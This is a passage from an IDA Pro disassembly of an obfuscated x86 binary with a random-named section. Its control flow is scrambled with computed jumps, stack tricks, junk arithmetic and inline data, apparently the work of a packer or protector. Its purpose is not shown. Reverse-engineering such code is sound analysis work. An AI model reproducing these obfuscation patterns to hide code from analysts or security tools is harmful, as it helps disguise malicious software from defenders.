loc_45546E:				; CODE XREF: hvvrg7ie:00453BEEj
		not	edx
		or	ebp, 5A6B4D38h

loc_455476:				; CODE XREF: hvvrg7ie:loc_43ABBFj
		push	0FE33D7F3h
		pop	eax
		sub	eax, 0E0399824h
		jmp	loc_43A2E3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_452F78

loc_455487:				; CODE XREF: sub_452F78-162EAj
		add	eax, 7A1D2AE7h
		and	eax, 435D870Ch
		add	eax, 0FE44BDB3h
		xchg	eax, [esp-4+arg_0]
		jmp	loc_45131B
; END OF FUNCTION CHUNK	FOR sub_452F78
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45061E

loc_4554A1:				; CODE XREF: sub_45061E-F2F8j
					; hvvrg7ie:00455656j
		and	edx, 0F352BC19h
		add	edx, 2043A5E9h

loc_4554AD:				; CODE XREF: hvvrg7ie:loc_43DF76j
		call	sub_452EBB

loc_4554B2:				; CODE XREF: sub_458BE3+11j
		jmp	loc_451D6C
; END OF FUNCTION CHUNK	FOR sub_45061E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45A0B1

loc_4554B7:				; CODE XREF: sub_45A0B1:loc_43D157j
		pop	esi
		mov	eax, ds:dword_439CA4
		or	eax, eax
		jnz	loc_452E6A
		jmp	loc_44647F
; END OF FUNCTION CHUNK	FOR sub_45A0B1
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43CEB6

loc_4554CB:				; CODE XREF: sub_43CEB6+Cj
		sub	ecx, 256A8EF6h
		xor	ecx, ds:4000F4h
		or	ecx, 32041967h
		test	ecx, 8000000h
		jmp	loc_43B18A
; END OF FUNCTION CHUNK	FOR sub_43CEB6

; =============== S U B	R O U T	I N E =======================================



sub_4554E8	proc near		; DATA XREF: sub_45ADCB-649Ao

var_10		= dword	ptr -10h

; FUNCTION CHUNK AT 0043AFE4 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 0043B672 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0043D86B SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0043E21D SIZE 00000019 BYTES
; FUNCTION CHUNK AT 0043EC4E SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00443636 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044374A SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00443A9F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443ED8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044621E SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00446BB0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044CBE2 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0044D522 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0044E250 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044EDC3 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004517A7 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 004519AA SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00452A0D SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00452B54 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00452C00 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454C63 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00454C92 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004556B1 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00456D1B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A740 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0045A95E SIZE 00000005 BYTES

		lea	eax, sub_4499A7
		push	eax
		push	0
		push	0
		push	ecx
		jmp	loc_45A740
sub_4554E8	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_448100

loc_4554F9:				; CODE XREF: sub_448100-63Ej
		jnz	loc_442B0D
		jmp	loc_43901C
; END OF FUNCTION CHUNK	FOR sub_448100
; ---------------------------------------------------------------------------

loc_455504:				; CODE XREF: hvvrg7ie:0045B65Bj
		jnz	loc_45A926
		shl	esi, 17h

loc_45550D:				; CODE XREF: hvvrg7ie:0045B652j
		and	eax, 60427A6Ah
		add	eax, 8EAA516Ah
		push	edx
		pushf
		jmp	loc_443F62
; ---------------------------------------------------------------------------
		mov	ds:dword_43D6F4, eax
; START	OF FUNCTION CHUNK FOR sub_451B45

loc_455525:				; CODE XREF: sub_451B45-EA9Ej
		push	0A320B9F9h
		pop	eax
		xor	eax, 382BFE42h

loc_455531:				; CODE XREF: hvvrg7ie:loc_440C53j
		add	eax, 9BB96BBh
		sub	eax, 0A110C8A1h
		xor	eax, 71E2E41Dh
		jmp	loc_440F57
; END OF FUNCTION CHUNK	FOR sub_451B45
; ---------------------------------------------------------------------------
		dd 10DE6B68h, 0B78A0F91h, 0E9FFFE8Fh, 0FFFF788Fh, 89BB0B68h
		dd 0C881588Ch, 689FDE52h, 810CC0C1h, 0A24917F8h, 7963E975h
		db 2 dup(0FFh)
; ---------------------------------------------------------------------------

loc_455572:				; DATA XREF: sub_44007A+Co
		add	eax, 740E96h
		xchg	eax, [esp]
		jmp	loc_449F88
; ---------------------------------------------------------------------------

loc_455580:				; CODE XREF: hvvrg7ie:0043D19Ej
		jg	loc_44767C
		jnb	loc_459C93
		shl	edx, 5
; START	OF FUNCTION CHUNK FOR sub_4522F8

loc_45558F:				; CODE XREF: sub_4522F8-1516Bj
		xor	edx, 0FC8DAC27h
		or	edx, 0DFB1F2B6h
		add	edx, 204FB148h
		xchg	edx, [esp+0]
		jmp	loc_45387C
; END OF FUNCTION CHUNK	FOR sub_4522F8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D16B

loc_4555A9:				; CODE XREF: sub_43D16B+D1E0j
		jle	loc_440B19
		shl	edi, 5
		mov	[eax], ecx
		adc	edi, ecx
		jmp	loc_43F308
; END OF FUNCTION CHUNK	FOR sub_43D16B
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C4D7

loc_4555BB:				; CODE XREF: sub_43C4D7:loc_440339j
		add	eax, 0CD4458BCh
		push	ecx
		pushf
		push	76D370E4h
		jmp	loc_4423CB
; END OF FUNCTION CHUNK	FOR sub_43C4D7
; ---------------------------------------------------------------------------

loc_4555CD:				; CODE XREF: hvvrg7ie:00440142j
		jnz	loc_44266E
		jmp	loc_43DEA5
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43931C

loc_4555D8:				; CODE XREF: sub_43931C+80B1j
					; sub_43931C:loc_44F984j
		call	sub_44DE0A
		mov	edx, 7DA6ACC0h
		call	sub_446A16
		push	eax
		ror	eax, 8

loc_4555EB:				; CODE XREF: hvvrg7ie:loc_457086j
		mov	ds:dword_43CDC0, eax
		jmp	nullsub_396
; END OF FUNCTION CHUNK	FOR sub_43931C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44457D

loc_4555F6:				; CODE XREF: sub_44457D+6j
		rol	edx, 0Bh

loc_4555F9:				; CODE XREF: sub_45AAC8:loc_443000j
		sbb	eax, ecx
		or	ebx, 50D4C9EDh
		or	edx, 0E085524Bh
		cmp	ebx, ecx
		jmp	loc_4483F3
; END OF FUNCTION CHUNK	FOR sub_44457D

; =============== S U B	R O U T	I N E =======================================



sub_45560E	proc near		; DATA XREF: sub_4446E9+18o
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0CFh
		jz	loc_45A25B
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0E9h
		jmp	loc_43B9D8
sub_45560E	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45B07D

loc_455625:				; CODE XREF: sub_45B07D:loc_45B08Aj
		mov	eax, [ebp-4]
		movzx	eax, byte ptr [eax]
		jmp	loc_44F92F
; END OF FUNCTION CHUNK	FOR sub_45B07D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44346F

loc_455630:				; CODE XREF: sub_44346F+35E5j
		pop	eax
		add	eax, ds:4000FBh
		rol	eax, 5
		sub	eax, 1CF1577Fh
		add	eax, 0C34A8E4Bh
		xchg	eax, [esp-4+arg_0]
		jmp	sub_4489AE
; END OF FUNCTION CHUNK	FOR sub_44346F
; ---------------------------------------------------------------------------

loc_45564E:				; CODE XREF: hvvrg7ie:00441333j
		jo	loc_43CA50
		rol	ecx, 1
		jmp	loc_4554A1
; ---------------------------------------------------------------------------
		sub	eax, ebx
		jmp	sub_4427B2
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C05

loc_455662:				; CODE XREF: sub_440C05+A32j
		sub	edi, 5C6B8EB9h
		mov	[ecx], ebp
; END OF FUNCTION CHUNK	FOR sub_440C05
; START	OF FUNCTION CHUNK FOR sub_45061E

loc_45566A:				; CODE XREF: sub_440C05:loc_43D9ABj
					; sub_45061E:loc_4416A5j ...
		jmp	loc_43E170
; END OF FUNCTION CHUNK	FOR sub_45061E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C05

loc_45566F:				; CODE XREF: sub_45061E:loc_43FF48j
					; sub_440C05+132C4j
		xchg	edi, [esp+0]
		mov	ecx, edi
		pop	edi
		jmp	loc_45328E
; END OF FUNCTION CHUNK	FOR sub_440C05
; ---------------------------------------------------------------------------

loc_45567A:				; CODE XREF: hvvrg7ie:0045AC7Bj
		not	eax

; =============== S U B	R O U T	I N E =======================================



sub_45567C	proc near		; CODE XREF: sub_448077+3p
		xchg	ebx, [esp+0]
		pop	ebx
		imul	byte ptr [edx]
		cmp	al, 0A4h
		jmp	loc_446E56
sub_45567C	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43AB99

loc_455689:				; CODE XREF: sub_43AB99-1806j
		pop	eax
		add	eax, 6DC8AFDCh
		and	eax, 9A21BE1Fh
		add	eax, 0F5FEDBE6h
		xchg	eax, [esp+4+var_4]
		push	0
		jmp	loc_43A405
; END OF FUNCTION CHUNK	FOR sub_43AB99
; ---------------------------------------------------------------------------
		and	eax, 81896019h
		jmp	sub_4398B7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4554E8

loc_4556B1:				; CODE XREF: sub_4554E8:loc_44EDC3j
		jnz	loc_4519AA

loc_4556B7:				; CODE XREF: sub_45889B-146DFj
		jmp	loc_454C92
; END OF FUNCTION CHUNK	FOR sub_4554E8
; ---------------------------------------------------------------------------
		or	ecx, esi
		xor	ebp, 6547A29Dh
		jmp	loc_4519A3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_4556C9:				; CODE XREF: sub_43D285+69FAj
		and	edi, 3DFC28BCh
		add	edi, 0F25BFF74h
		xchg	edi, [esp+20h+var_20]
		jmp	loc_4504B7
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439549

loc_4556DD:				; CODE XREF: sub_439549j
		push	44935786h
		pop	eax
		jmp	loc_443A47
; END OF FUNCTION CHUNK	FOR sub_439549

; =============== S U B	R O U T	I N E =======================================



sub_4556E8	proc near		; DATA XREF: sub_443452-A23Do

; FUNCTION CHUNK AT 0044466F SIZE 00000005 BYTES

		xchg	ebx, [esp+0]
		jmp	loc_44466F
sub_4556E8	endp

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_454E54

loc_4556F0:				; CODE XREF: sub_454E54+Bj
		push	offset sub_44388C
		jmp	nullsub_207
; END OF FUNCTION CHUNK	FOR sub_454E54
; ---------------------------------------------------------------------------
		not	ebx
		jmp	sub_43FB25

; =============== S U B	R O U T	I N E =======================================



sub_455701	proc near		; CODE XREF: hvvrg7ie:00445B1Aj
					; sub_447883+4p
		xchg	ebx, [esp+0]
		pop	ebx
		mov	esp, ebp
		pop	ebp
		push	6BC1777Ah
		pop	eax
		and	eax, 0C3CBF753h
		rol	eax, 10h
		jmp	loc_45140D
sub_455701	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43C811

loc_45571C:				; CODE XREF: sub_43C811:loc_446D4Fj
		jz	loc_4503D5
		jmp	loc_43DAEC
; END OF FUNCTION CHUNK	FOR sub_43C811
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446966

loc_455727:				; CODE XREF: sub_446966:loc_43FC7Aj
		or	ecx, 0B52F60E2h
		add	ecx, 1D603FDDh
		add	ecx, ebp
		push	edx
		push	741270A5h
		pop	edx
		rol	edx, 6
		jmp	loc_439600
; END OF FUNCTION CHUNK	FOR sub_446966
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_446D8D

loc_455744:				; CODE XREF: sub_446D8D-8D11j
					; sub_44BCAE-AF48j ...
		jmp	loc_458AF7
; ---------------------------------------------------------------------------

loc_455749:				; CODE XREF: sub_446D8D-5F9Dj
					; sub_44BCAE-F3j
		pop	ecx
		pop	ebp
		retn
; ---------------------------------------------------------------------------

loc_45574C:				; CODE XREF: sub_446D8D+FFA4j
		jmp	loc_44B4AC
; END OF FUNCTION CHUNK	FOR sub_446D8D

; =============== S U B	R O U T	I N E =======================================



sub_455751	proc near		; CODE XREF: hvvrg7ie:0043FB62p
					; sub_44A2AF-9AB0j ...

; FUNCTION CHUNK AT 0044AE54 SIZE 0000000D BYTES

		push	esi
		mov	esi, ebp
		jmp	loc_44AE54
sub_455751	endp

; ---------------------------------------------------------------------------

loc_455759:				; CODE XREF: hvvrg7ie:0043B827j
		js	loc_456933
		cdq
; START	OF FUNCTION CHUNK FOR sub_440C61

loc_455760:				; CODE XREF: sub_440C61:loc_43B81Bj
		sub	ecx, 9890AFF2h
		xor	ecx, 88EFFDFFh
		call	sub_4417B1
; END OF FUNCTION CHUNK	FOR sub_440C61
; START	OF FUNCTION CHUNK FOR sub_450434

loc_455771:				; CODE XREF: sub_450434-754Bj
		jmp	loc_445230
; END OF FUNCTION CHUNK	FOR sub_450434
; ---------------------------------------------------------------------------

loc_455776:				; CODE XREF: hvvrg7ie:0044573Aj
		jmp	loc_457422
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B2C4

loc_45577B:				; CODE XREF: sub_43B2C4+10j
		jmp	loc_45A538
; END OF FUNCTION CHUNK	FOR sub_43B2C4
; ---------------------------------------------------------------------------
		and	edi, eax
		jmp	loc_444A9E
; ---------------------------------------------------------------------------

loc_455787:				; CODE XREF: hvvrg7ie:loc_43D198j
		jnz	loc_447CB8
		push	5CC6A5E8h
		and	ebp, 856FD91Dh
		jmp	loc_447CB0

; =============== S U B	R O U T	I N E =======================================



sub_45579D	proc near		; CODE XREF: hvvrg7ie:004440EDj
					; hvvrg7ie:00451E5Cp
		xchg	edx, [esp+0]
		pop	edx
		add	esp, 0FFFFFFCCh
		lea	eax, nullsub_16
		call	sub_43D946
sub_45579D	endp ; sp-analysis failed

; START	OF FUNCTION CHUNK FOR sub_442FD1

loc_4557AF:				; CODE XREF: sub_442FD1+963Dj
		jmp	loc_45AFC4
; END OF FUNCTION CHUNK	FOR sub_442FD1
; ---------------------------------------------------------------------------

loc_4557B4:				; CODE XREF: hvvrg7ie:0044BBD8j
		jmp	locret_45320B
; ---------------------------------------------------------------------------
		adc	esi, 0B113CF6Fh
		sbb	ebx, ecx
		jmp	sub_45A003
; ---------------------------------------------------------------------------
		lea	eax, [ebp-14h]
		push	eax
		call	sub_43A87E
		jmp	loc_44BEE1

; =============== S U B	R O U T	I N E =======================================

; Attributes: bp-based frame


sub_4557D4	proc near		; CODE XREF: sub_43D16Bj

var_14		= byte ptr -14h
var_10		= dword	ptr -10h

; FUNCTION CHUNK AT 0043A67C SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0043A95D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043B90F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043C5C9 SIZE 0000002C BYTES
; FUNCTION CHUNK AT 0043CFEC SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00440FD7 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004412FE SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00445C26 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044BEDC SIZE 0000001C BYTES
; FUNCTION CHUNK AT 0044BFC3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044FB4C SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0044FFAC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045421F SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00456CA3 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00458205 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0045ACB5 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0045B5A0 SIZE 00000005 BYTES

		push	ebp
		mov	ebp, esp
		add	esp, 0FFFFFFECh
		cmp	ds:dword_458D54, 0
		jnz	loc_456CAD
		jmp	loc_43A95D
sub_4557D4	endp ; sp-analysis failed

; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_444363

loc_4557EC:				; CODE XREF: sub_444363:loc_44EDA2j
		mov	dl, [ebp-9]
		shr	edx, cl
		or	eax, edx
		mov	edx, [ebp-8]
		mov	[edx], al
		call	sub_45298F
; END OF FUNCTION CHUNK	FOR sub_444363
; START	OF FUNCTION CHUNK FOR sub_43EE33

loc_4557FD:				; CODE XREF: sub_43EE33+1Aj
		jmp	loc_43902B
; END OF FUNCTION CHUNK	FOR sub_43EE33
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_456A52

loc_455802:				; CODE XREF: sub_456A52-AF90j
		add	edx, 0CD9603B0h
		popf
		test	edx, 380F7CBh
		jmp	loc_43FFB3
; END OF FUNCTION CHUNK	FOR sub_456A52
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_39. PRESS	KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4518BD

loc_455815:				; CODE XREF: sub_4518BD+3j
		jmp	loc_446F59
; END OF FUNCTION CHUNK	FOR sub_4518BD
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_45038B

loc_45581A:				; CODE XREF: sub_45038B-10565j
		push	eax

loc_45581B:				; CODE XREF: sub_45038B:loc_43A6CBj
		push	ecx
		push	9F439F3Eh
		xchg	edi, [esp+0]
		mov	ecx, edi
		pop	edi
		and	ecx, 117E8CF4h
		or	ecx, 2BBC1172h
		jmp	loc_440A5B
; END OF FUNCTION CHUNK	FOR sub_45038B
; ---------------------------------------------------------------------------
		add	ebx, 8D4EFDE1h
		jmp	sub_43D8F7
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4426E2

loc_455843:				; CODE XREF: sub_4426E2-1E4j
		sub	ebx, edx
		mov	esi, 0BC1D9254h
		mov	ebx, [esi]

loc_45584C:				; CODE XREF: sub_4426E2:loc_4424F6j
		and	edi, 0A93E2B7Bh
		add	edi, 5816836Fh
		jmp	loc_446BB5
; END OF FUNCTION CHUNK	FOR sub_4426E2
; ---------------------------------------------------------------------------
		xchg	edx, ebx
		jmp	sub_4496DF
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_451E1C

loc_455864:				; CODE XREF: sub_451E1C:loc_44E833j
		mov	esp, ebp
		call	sub_43B6A5

loc_45586B:				; CODE XREF: sub_448ECC+DFDBj
		jmp	loc_444470
; END OF FUNCTION CHUNK	FOR sub_451E1C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CEC8

loc_455870:				; CODE XREF: sub_44CEC8-A585j
		jmp	loc_43D375
; END OF FUNCTION CHUNK	FOR sub_44CEC8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455ACA

loc_455875:				; CODE XREF: sub_455ACA+2248j
		xor	ecx, eax
		cmp	edx, eax
		jmp	loc_456D93
; END OF FUNCTION CHUNK	FOR sub_455ACA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_453405

loc_45587E:				; CODE XREF: sub_453405-E868j
		jo	loc_444C15

loc_455884:				; CODE XREF: sub_453405:loc_43D860j
		call	sub_44DE0A
		push	9B7A7095h
		pop	edx
		xor	edx, 0F0FA3756h
		rol	edx, 0Ch

loc_455898:				; CODE XREF: hvvrg7ie:loc_43B4DAj
		jmp	loc_43D514
; END OF FUNCTION CHUNK	FOR sub_453405
; ---------------------------------------------------------------------------

loc_45589D:				; CODE XREF: hvvrg7ie:loc_4485E2j
		push	0C0BF2E30h
		pop	eax
		sub	eax, 0BE64F01Ah
		and	eax, 0C71A668Dh
		rol	eax, 15h
		add	eax, 3FC4971Eh
		xchg	eax, [esp]
		jmp	loc_457E4A
; ---------------------------------------------------------------------------
		add	eax, 0E2DCD051h
		jmp	sub_4405AA
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_441167

loc_4558CB:				; CODE XREF: sub_441167:loc_4506ABj
		jb	loc_44D932
		push	0C1D7857Eh
		pushf
		jmp	loc_44D932
; END OF FUNCTION CHUNK	FOR sub_441167
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43D285

loc_4558DC:				; CODE XREF: sub_43D285:loc_43EEC5j
		pop	edi
		sub	edi, 547FC468h
		rol	edi, 0Ah
		test	edi, 20000000h
		jmp	loc_458119
; END OF FUNCTION CHUNK	FOR sub_43D285
; ---------------------------------------------------------------------------

loc_4558F1:				; CODE XREF: hvvrg7ie:loc_44468Bj
					; hvvrg7ie:004545F9j
		push	83495948h
		pop	eax
		sub	eax, 14839DDDh
		xor	eax, 50B6FD18h
		add	eax, ebp
		push	ecx
		push	2A4044F7h
		pop	ecx
		jmp	loc_44F671
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_442B5C

loc_455911:				; CODE XREF: sub_442B5C-472Cj
		add	edi, 0C7171Ah
		xchg	edi, [esp+0]
		jmp	loc_443B25
; END OF FUNCTION CHUNK	FOR sub_442B5C
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455087

loc_45591F:				; CODE XREF: sub_455087:loc_43E918j
		add	edi, 0E5CF8BDCh
		mov	[edi], eax
		pop	edi
		call	sub_4442B9

loc_45592D:				; CODE XREF: hvvrg7ie:00442787j
		jmp	loc_448021
; END OF FUNCTION CHUNK	FOR sub_455087
; ---------------------------------------------------------------------------

loc_455932:				; CODE XREF: hvvrg7ie:0043A475j
		jmp	loc_456F02
; ---------------------------------------------------------------------------

loc_455937:				; CODE XREF: hvvrg7ie:0044E787j
		add	eax, 0C0FDDCC1h
		test	eax, 8000000h
		jmp	loc_439358
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44CF7D

loc_455948:				; CODE XREF: sub_44CF7D-11C3Bj
					; sub_450F97-1149Aj ...
		jmp	loc_457850
; END OF FUNCTION CHUNK	FOR sub_44CF7D
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450AA8

loc_45594D:				; CODE XREF: sub_450F97-1381Ej
					; sub_450AA8:loc_44F3ACj
		pop	ecx
		call	sub_44C19A

loc_455953:				; CODE XREF: sub_446E8C+DF3Aj
		jmp	loc_444BF8
; END OF FUNCTION CHUNK	FOR sub_450AA8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_440C05

loc_455958:				; CODE XREF: sub_440C05+132CAj
		jmp	loc_43D9AB
; END OF FUNCTION CHUNK	FOR sub_440C05
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BCAE

loc_45595D:				; CODE XREF: sub_44BCAE:loc_45B630j
		jz	loc_455744
		jmp	loc_44CFB6
; END OF FUNCTION CHUNK	FOR sub_44BCAE
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44412E

loc_455968:				; CODE XREF: sub_44412E+13j
		jz	loc_448F6E

loc_45596E:				; CODE XREF: sub_43FC15+1471Aj
		jmp	loc_445D93
; END OF FUNCTION CHUNK	FOR sub_44412E
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_445BE8

loc_455973:				; CODE XREF: sub_445BE8+38FCj
					; sub_4414F6:loc_44D0B7j
		jmp	loc_44994D
; END OF FUNCTION CHUNK	FOR sub_445BE8
; ---------------------------------------------------------------------------
		sub	ecx, ebp
		jmp	loc_448F68
; ---------------------------------------------------------------------------

locret_45597F:				; CODE XREF: hvvrg7ie:loc_43FE91j
		retn
; ---------------------------------------------------------------------------

loc_455980:				; CODE XREF: hvvrg7ie:00451576j
		sbb	esi, 37D2282Ch

loc_455986:				; CODE XREF: hvvrg7ie:00451565j
		and	eax, 5A508AE2h
		or	eax, 0CC0D2B85h
		xor	eax, 0A8CB7AEBh
		add	eax, 89BCCBA8h
		mov	eax, [eax]
		or	eax, eax
		jnz	loc_45AEF0
		jmp	loc_4396A4
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_176. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450AA8

loc_4559AE:				; CODE XREF: sub_450AA8-BEF9j
		jmp	nullsub_215
; END OF FUNCTION CHUNK	FOR sub_450AA8
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_439953

loc_4559B3:				; CODE XREF: sub_439953+15j
		jmp	loc_45ADA4
; END OF FUNCTION CHUNK	FOR sub_439953
; ---------------------------------------------------------------------------
		sbb	ecx, edi
		jmp	loc_458173
; ---------------------------------------------------------------------------

loc_4559BF:				; CODE XREF: hvvrg7ie:004464ABj
		jnb	loc_44108A
		mov	eax, [ebp+8]
		cmp	dword ptr [eax-14h], 4
		call	sub_450D8D
; START	OF FUNCTION CHUNK FOR sub_44E3B3

loc_4559D1:				; CODE XREF: sub_44E3B3+C2F1j
		jmp	loc_43E384
; END OF FUNCTION CHUNK	FOR sub_44E3B3
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43B9C9

loc_4559D6:				; CODE XREF: sub_43B9C9+1E894j
		jmp	loc_4514C0
; END OF FUNCTION CHUNK	FOR sub_43B9C9
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_449425

loc_4559DB:				; CODE XREF: sub_449425-8297j
		adc	eax, edx
		adc	eax, edi

loc_4559DF:				; CODE XREF: sub_44BFF5+2C0Bj
		ror	ebx, 0Eh

loc_4559E2:				; CODE XREF: sub_4544DD:loc_440AE9j
		mov	eax, 33F214AFh
		jmp	loc_452DBC
; END OF FUNCTION CHUNK	FOR sub_449425
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44BEBB

loc_4559EC:				; CODE XREF: sub_44BEBB-F589j
					; hvvrg7ie:0044E67Bj
		push	esi
		call	sub_45006C

loc_4559F2:				; CODE XREF: sub_445CB5-3A29j
		jmp	loc_454302
; END OF FUNCTION CHUNK	FOR sub_44BEBB
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_4465A6

loc_4559F7:				; CODE XREF: sub_4465A6-1C7Bj
					; hvvrg7ie:0044DDF2j
		sub	ebx, ebp
		add	eax, ecx
		xor	ebx, eax

loc_4559FD:				; CODE XREF: hvvrg7ie:loc_44B92Bj
		push	0E0388624h
		pop	eax
		add	eax, 73DF583Bh
		or	eax, 385EE8D9h
		jmp	loc_450154
; END OF FUNCTION CHUNK	FOR sub_4465A6
; ---------------------------------------------------------------------------
		mov	ecx, ebp
		jmp	loc_44E215
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_408. PRESS KEYPAD	"+" TO EXPAND]
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_44370F

loc_455A1C:				; CODE XREF: sub_44E34F:loc_43BC07j
					; sub_44370F+FD0Ej
		mov	eax, [ebp-4]
		cmp	byte ptr [eax],	0F1h
		jnz	loc_4500DF
		jmp	loc_442482
; END OF FUNCTION CHUNK	FOR sub_44370F
; ---------------------------------------------------------------------------
		jnb	loc_454EA3
		jmp	sub_4580B4
; ---------------------------------------------------------------------------

loc_455A38:				; CODE XREF: hvvrg7ie:0044392Ej
		popf
		jmp	loc_4504A6
; ---------------------------------------------------------------------------

locret_455A3E:				; CODE XREF: hvvrg7ie:0043AD05j
		retn
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_450590

loc_455A3F:				; CODE XREF: sub_450590+A2DAj
		jmp	loc_450AF5
; END OF FUNCTION CHUNK	FOR sub_450590
; ---------------------------------------------------------------------------

loc_455A44:				; CODE XREF: hvvrg7ie:00454B4Cj
		jmp	nullsub_19
; ---------------------------------------------------------------------------

loc_455A49:				; CODE XREF: hvvrg7ie:0044FA0Ej
		sub	edx, ebx
		adc	ebp, 900EE3C6h
; START	OF FUNCTION CHUNK FOR sub_442F15

loc_455A51:				; CODE XREF: sub_442F15:loc_44F9FBj
		push	offset sub_44A4C4
		jmp	nullsub_415
; END OF FUNCTION CHUNK	FOR sub_442F15
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_455ACA

loc_455A5B:				; CODE XREF: sub_455ACA-13920j
		jnz	loc_4512C3
		jmp	loc_457E83
; END OF FUNCTION CHUNK	FOR sub_455ACA
; ---------------------------------------------------------------------------
		mov	[ebx], eax
		jmp	loc_444D08
; ---------------------------------------------------------------------------
		rol	edi, 6
		jmp	sub_44F776
; ---------------------------------------------------------------------------
; START	OF FUNCTION CHUNK FOR sub_43A0C9

